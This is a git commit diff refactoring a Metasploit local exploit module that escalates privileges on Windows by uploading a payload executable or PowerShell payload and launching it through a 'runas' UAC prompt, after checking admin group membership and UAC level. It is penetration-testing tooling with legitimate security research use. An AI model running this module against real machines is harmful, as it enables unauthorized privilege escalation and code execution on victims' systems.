Added priv lib and runas lib

Cleaned up code with using the new lib files
bug/bundler_fix
b00stfr3ak 2013-10-25 14:05:33 -07:00
parent 9695b2d662
commit 868b70c9ed
1 changed files with 24 additions and 55 deletions

View File

@ -6,15 +6,12 @@
##
require 'msf/core'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::EXE
include Post::File
include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Runas
def initialize(info={})
super( update_info( info,
@ -51,78 +48,50 @@ class Metasploit3 < Msf::Exploit::Local
def check
session.readline
print_status('Checking admin status...')
whoami = session.sys.process.execute('cmd /c whoami /groups',
nil,
{'Hidden' => true, 'Channelized' => true}
)
cmdout = []
while(cmdoutput = whoami.channel.read)
cmdout << cmdoutput
end
if cmdout.size == 0
fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
admin_group = is_in_admin_group?
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
return Exploit::CheckCode::Unknown
else
isinadmins = cmdout.join.scan(/S-1-5-32-544/)
if isinadmins.size > 0
if admin_group
print_good('Part of Administrators group! Continuing...')
return Exploit::CheckCode::Vulnerable
else
print_error('Not in admins group, cannot escalate with this module')
print_error('Exiting...')
print_error("Not in admins group, cannot escalate with this module")
return Exploit::CheckCode::Safe
end
end
end
def exploit
admin_check = check
if admin_check.join =~ /safe/
return Exploit::CheckCode::Safe
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
open_key = session.sys.registry.open_key(root_key, base_key)
lua_setting = open_key.query_value('EnableLUA')
if lua_setting.data == 1
if is_uac_enabled?
print_status "UAC is Enabled, checking level..."
else
print_good "UAC is not enabled, no prompt for the user"
if is_in_admin_group?
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
else
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
end
uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
case uac_level.data
when 2
print_status "UAC is set to 'Always Notify'"
end
case get_uac_level
when UAC_NO_PROMPT
print_good "UAC is not enabled, no prompt for the user"
else
print_status "The user will be prompted, wait for them to click 'Ok'"
when 5
print_debug "UAC is set to Default"
print_debug "The user will be prompted, wait for them to click 'Ok'"
when 0
print_good "UAC is not enabled, no prompt for the user"
end
#
# Generate payload and random names for upload
#
case datastore["TECHNIQUE"]
when "EXE"
exe_payload = generate_payload_exe
payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
payload_path = datastore["PATH"] || expand_path("%TEMP%")
cmd_location = "#{payload_path}\\#{payload_filename}"
if datastore["UPLOAD"]
print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
write_file(cmd_location, exe_payload)
else
#print_error("No Upload Path!")
fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
return
end
command, args = cmd_location,nil
session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
execute_exe(datastore["FILENAME"],datastore["PATH"],datastore["UPLOAD"])
when "PSH"
command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
end
session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
execute_psh
end
end
end